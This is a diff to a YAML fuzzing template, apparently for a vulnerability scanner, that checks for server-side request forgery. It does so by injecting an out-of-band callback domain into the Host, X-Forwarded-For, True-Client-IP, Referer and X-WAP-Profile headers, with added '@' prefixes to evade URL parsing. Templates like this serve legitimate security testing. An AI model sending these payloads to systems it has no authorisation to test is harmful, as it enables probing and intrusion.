--- a/fuzzing/basic_ssrf.yaml
+++ b/fuzzing/basic_ssrf.yaml
@@ -9,7 +9,7 @@ requests:
   - raw:
     - |
       GET / HTTP/1.1
-      Host: {{Hostname}}.gsc0kvs26co9gcwn3x8gj8snaeg44t.c.act1on3.site
+      Host: {{Hostname}}@{{Hostname}}.gsc0kvs26co9gcwn3x8gj8snaeg44t.c.act1on3.site
       User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
       Accept-Language: en-US,en;q=0.9
       Connection: close
@@ -19,8 +19,8 @@ requests:
     - |
       GET / HTTP/1.1
       Host: {{Hostname}}
-      X-Forwarded-For: {{Hostname}}.gsc0kvs26co9gcwn3x8gj8snaeg44t.c.act1on3.site
-      True-Client-IP: {{Hostname}}.gsc0kvs26co9gcwn3x8gj8snaeg44t.c.act1on3.site
+      X-Forwarded-For: {{Hostname}}@{{Hostname}}.gsc0kvs26co9gcwn3x8gj8snaeg44t.c.act1on3.site
+      True-Client-IP: {{Hostname}}@{{Hostname}}.gsc0kvs26co9gcwn3x8gj8snaeg44t.c.act1on3.site
       Referer: http://{{Hostname}}.gsc0kvs26co9gcwn3x8gj8snaeg44t.c.act1on3.site
       X-WAP-Profile: http://{{Hostname}}.gsc0kvs26co9gcwn3x8gj8snaeg44t.c.act1on3.site/wap.xml
       User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
@@ -29,7 +29,7 @@ requests:
   - raw:
     - |
       GET / HTTP/1.1
-      Host: {{Hostname}}.gsc0kvs26co9gcwn3x8gj8snaeg44t.c.act1on3.site
+      Host: {{Hostname}}@{{Hostname}}.gsc0kvs26co9gcwn3x8gj8snaeg44t.c.act1on3.site
       Via: {{Hostname}}
       User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
       Accept-Language: en-US,en;q=0.9
